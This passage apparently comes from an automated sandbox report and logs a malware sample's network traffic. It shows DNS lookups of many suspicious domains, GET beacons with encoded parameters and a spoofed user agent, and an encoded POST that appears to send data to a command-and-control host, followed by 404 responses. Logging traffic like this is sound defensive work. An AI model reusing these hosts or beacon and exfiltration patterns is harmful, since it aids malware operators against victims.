                      Source: global trafficHTTP traffic detected: GET /cu07/?T4OdNH=91PbMFSFbRabMZnMSUj76NvR/Zd0MhT8JKpW4EQcOk8mlMTVcdIaqQPrq3FRSR+owpFtRocVxvjr424E5RpVHJgZhbFN+EtYqaINmBGTcL2VcGMzu+tmB3TsTAvOn48cudhpsmM=&r4=tP5HWLt8wXstw4H HTTP/1.1Host: www.f5jh81t3k1w8.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /6jon/?r4=tP5HWLt8wXstw4H&T4OdNH=lY14yI5fwZOcgUQUpnTLlx+QJBfbC4DwEOc7MQQgkkxJhrqVuxiq0TqPiA2X0dq4ve8sLU4ITp6q3cu8oZorZNmhdsAOEHd31HcaUahVOt7Sj+u/MvofX8Uu67Ih0HTVKoUtY2c= HTTP/1.1Host: www.cruycq.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /qc6u/?T4OdNH=KasN1xnr6qxo50+siIN0KAfRtD0D1F2Xjd0YqYDU3pURb3uX+HWLUZelx9Jnej1VJkKFsqm6fN7HUYc3wzos1lmCBt8frBU6tWvEY3xAPNLu5kbYSa6DvHLcvpdXX1zJ5HhRaag=&r4=tP5HWLt8wXstw4H HTTP/1.1Host: www.neoparty.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /m5bf/?T4OdNH=FKbczbLQ0sosfCA1qCrPSRQ7VsQywqY/pLAdnJ/+09co5PW+cyiO7Vblbf5B8jAN4N3DOHH6+lmh0DtSmFnRLbtcPKmyFQ0Njr8nYR2PceIb1tebNbsHFqS/Z3HN1OVssaooHgA=&r4=tP5HWLt8wXstw4H HTTP/1.1Host: www.deadshoy.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /9bhq/?T4OdNH=E1KWPzuDUrXzeIr+MheblCNEP6GOTx17RfcrRTPFJ37rektGz/Z4QpsAgIJ1fke2ZLjhPbUfcs2Q2jBDnmdO4FnF2DWbeyRHVN+LoHOctdylDUorIjBcKbLwehehFJbE7gRrWpM=&r4=tP5HWLt8wXstw4H HTTP/1.1Host: www.mosorehlable.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /stho/?T4OdNH=mmN5n3cJgwCS/hPSyyDLsNIVXPMNWoUq1Zr31hV11eqK/h/PlpONTBiAVWsNASboghm0fbZ0NPzr87fjFnRbzCyOI219SS/ig8yR+3V4slRmOpkmcKIusrBtdNsAS/Tkjrlhc08=&r4=tP5HWLt8wXstw4H HTTP/1.1Host: www.solidf.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /5mxq/?T4OdNH=iO94RS5UfBQ5HC+BbRXYGHpdoey0nMmihjIqhakPtq2eYvg9AqcPAmRUPZBNji7wd38qvvn/XQ+Vfr9uTuQ/zSitIKONVg6W4BJ6U8+dApebSQkrfqhDfnKkuLJ5c8X1k/dz1dA=&r4=tP5HWLt8wXstw4H HTTP/1.1Host: www.laduta.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /13to/?r4=tP5HWLt8wXstw4H&T4OdNH=z2EgoPQiqWsx10s8imXn9EhLUqHIpfNm2M9hnivL2yIwQ5T5ZMz+m2ngmAV/UVpa818CagjxjfYFH/Xhgr0dlnT3xa+eVvaI/ZjmdVMj8eQS2FfncZyG6J/yATIX4FRolS5bDYc= HTTP/1.1Host: www.londonatnight.coffeeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /vw2j/?T4OdNH=F7RSTrW3DDBOwoki0QfY8aMemtw+1yb0ACfdAp004E8YzbKK22gfddsBa0Epuash8ZsdFHh4aRsfLVhTQDdPUk63V/0r5CFiWCnEBQtSiunsCfq281UiBsQJqTZKZhMxvZDp0qs=&r4=tP5HWLt8wXstw4H HTTP/1.1Host: www.itcomp.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /rdtl/?T4OdNH=ZOY+qajotO8Y54RWsMlJRfAzJROg7M0EIy2xGwNHpdBqbD/KLW5LjtA9XnFn7YFdiYP1wWcAq05pnCTjdSlGxG6S3f6vZO/FXf/kuh5YN7SlcCVE00CSvDbDDRrbh0G7SoDKmOo=&r4=tP5HWLt8wXstw4H HTTP/1.1Host: www.aihuzhibo.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /cu07/?T4OdNH=91PbMFSFbRabMZnMSUj76NvR/Zd0MhT8JKpW4EQcOk8mlMTVcdIaqQPrq3FRSR+owpFtRocVxvjr424E5RpVHJgZhbFN+EtYqaINmBGTcL2VcGMzu+tmB3TsTAvOn48cudhpsmM=&r4=tP5HWLt8wXstw4H HTTP/1.1Host: www.f5jh81t3k1w8.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: global trafficDNS traffic detected: DNS query: www.aihuzhibo.net
                      Source: global trafficDNS traffic detected: DNS query: www.f5jh81t3k1w8.sbs
                      Source: global trafficDNS traffic detected: DNS query: www.cruycq.info
                      Source: global trafficDNS traffic detected: DNS query: www.neoparty.sbs
                      Source: global trafficDNS traffic detected: DNS query: www.1126xx.shop
                      Source: global trafficDNS traffic detected: DNS query: www.deadshoy.tech
                      Source: global trafficDNS traffic detected: DNS query: www.reynamart.store
                      Source: global trafficDNS traffic detected: DNS query: www.mosorehlable.online
                      Source: global trafficDNS traffic detected: DNS query: www.solidf.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.laduta.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.londonatnight.coffee
                      Source: global trafficDNS traffic detected: DNS query: www.itcomp.store
                      Source: global trafficDNS traffic detected: DNS query: www.envisionmedia.shop
                      Source: global trafficDNS traffic detected: DNS query: www.vavada-official.buzz
                      Source: global trafficDNS traffic detected: DNS query: www.sob.rip
                      Source: global trafficDNS traffic detected: DNS query: www.brunokito.cloud
                      Source: unknownHTTP traffic detected: POST /cu07/ HTTP/1.1Host: www.f5jh81t3k1w8.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.f5jh81t3k1w8.sbsReferer: http://www.f5jh81t3k1w8.sbs/cu07/Cache-Control: no-cacheContent-Length: 211Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36Data Raw: 54 34 4f 64 4e 48 3d 77 33 6e 37 50 78 2b 30 4c 78 4b 35 45 75 2f 68 53 30 33 37 78 4e 43 78 2f 61 35 69 4e 44 54 57 42 73 56 42 33 54 39 4c 52 30 59 39 71 62 76 42 63 66 39 53 67 79 76 31 74 58 4e 5a 4c 6c 36 45 33 4c 55 49 51 35 31 61 30 75 6d 36 34 6c 46 6f 70 69 5a 59 50 38 6c 38 72 70 6f 4c 2b 54 52 4b 71 65 51 7a 6d 33 66 49 52 36 76 6e 56 44 77 46 34 66 63 31 43 47 2f 4b 54 42 43 4f 7a 63 45 35 75 4e 45 45 75 44 4d 76 56 48 51 63 56 5a 66 7a 78 35 52 68 51 44 64 4f 6f 32 4e 31 66 73 58 56 33 30 55 56 59 6e 45 30 75 35 67 58 75 52 38 58 53 7a 4a 53 64 7a 69 49 51 48 4e 56 66 47 2f 6e 78 55 78 34 36 51 74 4f 31 30 2b 4e Data Ascii: T4OdNH=w3n7Px+0LxK5Eu/hS037xNCx/a5iNDTWBsVB3T9LR0Y9qbvBcf9Sgyv1tXNZLl6E3LUIQ51a0um64lFopiZYP8l8rpoL+TRKqeQzm3fIR6vnVDwF4fc1CG/KTBCOzcE5uNEEuDMvVHQcVZfzx5RhQDdOo2N1fsXV30UVYnE0u5gXuR8XSzJSdziIQHNVfG/nxUx46QtO10+N
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 13:59:52 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 13:59:54 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 13:59:57 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 13:59:59 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 08 Jan 2025 14:00:06 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 08 Jan 2025 14:00:09 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 08 Jan 2025 14:00:09 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 08 Jan 2025 14:00:09 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:00:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AaU4ivDhT3Zk%2F51rHf1hPzSr4Fak1GDP482%2BlcL63VV8jGbPRNV6RNT%2BcDUzDQSD%2F9jAxGByox3KXcVHsRaltKQ3bTQgyHvD4ZU5YoHTdxYGxfD92mHkYcT5HTg4ucjsFsT%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fecb6945e944352-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1662&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=766&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 53 4d 6f db 30 0c bd 1b d8 7f 60 1c 14 d8 80 08 b6 5b 17 18 6c d9 d8 b0 0f ec b4 ed d0 cb 8e 8a 4d c7 44 64 c9 93 e8 24 5d d1 ff 5e c8 6e ba 66 d3 41 12 29 f2 f1 f1 81 92 ab cf 3f 3e dd fd fa f9 05 7a 1e 74 1d c9 70 80 e7 7b 8d 55 dc 23 ed 7a 2e b2 34 bd 8a c3 13 aa b6 8e e4 80 ac c0 a8 01 ab f8 40 78 1c ad e3 18 1a 6b 18 0d 57 f1 91 5a ee ab 16 0f d4 a0 98 8d 0d 90 21 26 a5 85 6f 94 c6 2a db 80 ef 1d 99 bd 60 2b 3a e2 ca d8 18 92 3a 92 4c ac b1 86 3c cd e1 bb 65 f8 6a 27 d3 be 89 64 b2 f8 e5 4c aa fe 30 60 4b 0a de 8e 0e 3b 74 5e 34 56 5b 27 7c d3 e3 80 45 ab dc fe dd c3 d6 b6 f7 0f 5b d5 ec 77 2e 40 2c 21 c5 3a 4d d3 15 0d 81 ae 32 fc f8 28 93 05 50 26 cf 7d 85 b4 73 e7 4b 0a ac f3 3c 2f 61 50 6e 47 a6 48 cb ce 1a 2e c0 58 37 28 0d 59 3e 9e 92 eb 74 3c c1 47 47 4a 6f e0 1b ea 03 32 35 6a 03 5e 19 2f 3c 3a ea 4a 78 25 62 09 ff b1 82 75 d7 75 65 50 b7 a5 c3 3f ba ab 89 6d 09 03 19 71 81 11 d7 10 d6 eb Data Ascii: 1edeSMo0`[lMDd$]^nfA)?>ztp{U#z.4@xkWZ!&o*`+::L<ej'dL0`K;t^4V['|E[w.@,!:M2(P&}sK</aPnGH.X7(Y>t<GGJo25j^/<:Jx%buueP?mq
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 14:00:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RcRaYP8bJSkzgoPI9TPBNaZcrk9W%2FZKNpXuxNTWl61TLdRYaAlytSwhXAF4Z1UGZ4AQoS14pJwZ7j14t735VNo3AYRSHq1gVrGN3mM2JlWx1XkIQzkySW3BdENsnuAHJrEUv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fecb6a4dd968c36-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2099&min_rtt=2099&rtt_var=1049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 53 4d 6f db 30 0c bd 1b d8 7f 60 1c 14 d8 80 08 b6 5b 17 18 6c d9 d8 b0 0f ec b4 ed d0 cb 8e 8a 4d c7 44 64 c9 93 e8 24 5d d1 ff 5e c8 6e ba 66 d3 41 12 29 f2 f1 f1 81 92 ab cf 3f 3e dd fd fa f9 05 7a 1e 74 1d c9 70 80 e7 7b 8d 55 dc 23 ed 7a 2e b2 34 bd 8a c3 13 aa b6 8e e4 80 ac c0 a8 01 ab f8 40 78 1c ad e3 18 1a 6b 18 0d 57 f1 91 5a ee ab 16 0f d4 a0 98 8d 0d 90 21 26 a5 85 6f 94 c6 2a db 80 ef 1d 99 bd 60 2b 3a 